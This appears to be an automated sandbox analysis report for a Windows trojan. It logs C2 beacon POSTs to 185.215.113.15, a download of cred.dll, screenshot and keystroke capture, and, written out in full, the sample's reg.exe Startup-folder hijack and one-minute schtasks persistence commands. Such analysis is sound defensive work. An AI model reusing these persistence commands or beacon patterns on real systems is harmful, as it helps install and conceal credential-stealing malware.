Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----3823d6dafa9723c13eb7a8bc02000020Host: 185.215.113.15Content-Length: 95420Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----3823d6dafa9723c13eb7a8bc02000020Host: 185.215.113.15Content-Length: 95420Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----d51656dda67009af4d34db106d3e2a75Host: 185.215.113.15Content-Length: 95758Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----3823d6dafa9723c13eb7a8bc02000020Host: 185.215.113.15Content-Length: 95420Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----3823d6dafa9723c13eb7a8bc02000020Host: 185.215.113.15Content-Length: 95420Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----3823d6dafa9723c13eb7a8bc02000020Host: 185.215.113.15Content-Length: 95420Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.215.113.15 185.215.113.15
Source: Joe Sandbox View IP Address: 185.215.113.15 185.215.113.15
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Jun 2022 07:46:53 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 276Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 38 35 2e 32 31 35 2e 31 31 33 2e 31 35 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 185.215.113.15 Port 80</address></body></html>
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown HTTP traffic detected: POST /Lkb2dxj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.15Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 32 31 26 73 64 3d 62 62 30 37 30 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 37 35 30 35 32 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=425620883392&vs=3.21&sd=bb0705&os=1&bi=1&ar=1&pc=675052&un=user&dm=&av=13&lv=0&og=0
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_004081B0 CreateMutexW,GetLastError,CreateFileA,InternetOpenA,InternetOpenUrlA,InternetReadFile,WriteFile,WriteFile,InternetReadFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 0_2_004081B0
Source: global traffic HTTP traffic detected: GET /Lkb2dxj3/cred.dll HTTP/1.1Host: 185.215.113.15
Contains functionality to record screenshots
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_00402410 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown, 0_2_00402410
Creates a DirectInput object (often for capturing keystrokes)
Source: yIF7nMz573.exe, 00000000.00000002.271960953.0000000000E9A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Uses 32bit PE files
Source: yIF7nMz573.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Detected potential crypto function
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_004061E0 0_2_004061E0
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_00428610 0_2_00428610
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_00404710 0_2_00404710
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_0042B947 0_2_0042B947
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_0042BA67 0_2_0042BA67
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_00428AA8 0_2_00428AA8
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_0042DCA0 0_2_0042DCA0
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_0042CCBD 0_2_0042CCBD
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_00405D80 0_2_00405D80
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_0041CF57 0_2_0041CF57
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Code function: 10_2_004061E0 10_2_004061E0
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Code function: 10_2_00428610 10_2_00428610
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Code function: 10_2_00404710 10_2_00404710
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Code function: 10_2_0042B947 10_2_0042B947
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Code function: 10_2_0042BA67 10_2_0042BA67
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Code function: 10_2_00428AA8 10_2_00428AA8
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Code function: 10_2_0042DCA0 10_2_0042DCA0
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Code function: 10_2_0042CCBD 10_2_0042CCBD
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Code function: 10_2_00405D80 10_2_00405D80
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Code function: 10_2_0041CF57 10_2_0041CF57
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: String function: 00418910 appears 44 times
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: String function: 00416FE0 appears 119 times
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Code function: String function: 00418910 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Code function: String function: 00416FE0 appears 119 times
Abnormal high CPU Usage
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Process Stats: CPU usage > 98%
Uses reg.exe to modify the Windows registry
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\62eca45584\
Source: yIF7nMz573.exe Virustotal: Detection: 36%
Source: yIF7nMz573.exe ReversingLabs: Detection: 46%
Source: C:\Users\user\Desktop\yIF7nMz573.exe File read: C:\Users\user\Desktop\yIF7nMz573.exe Jump to behavior
Source: yIF7nMz573.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\yIF7nMz573.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\yIF7nMz573.exe "C:\Users\user\Desktop\yIF7nMz573.exe"
Source: C:\Users\user\Desktop\yIF7nMz573.exe Process created: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe "C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe"
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\62eca45584\
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN bguuwe.exe /TR "C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe" /F
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\62eca45584\
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe
Source: C:\Users\user\Desktop\yIF7nMz573.exe Process created: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe "C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\62eca45584\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN bguuwe.exe /TR "C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe" /F Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\62eca45584\ Jump to behavior
Source: C:\Users\user\Desktop\yIF7nMz573.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe File created: C:\Users\user\AppData\Roaming\110809d565579c Jump to behavior
Source: C:\Users\user\Desktop\yIF7nMz573.exe File created: C:\Users\user\AppData\Local\Temp\62eca45584 Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winEXE@13/3@0/1
Source: C:\Users\user\Desktop\yIF7nMz573.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\yIF7nMz573.exe Code function: 0_2_00EA26A6 CreateToolhelp32Snapshot,Module32First, 0_2_00EA26A6
Source: C:\Users\user\AppData\Local\Temp\62eca45584\bguuwe.exe Mutant created: \Sessions\1\BaseNamedObjects\152138533219352125563209
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6776:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6832:120:WilError_01
Source: C:\Users\user\Desktop\yIF7nMz573.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
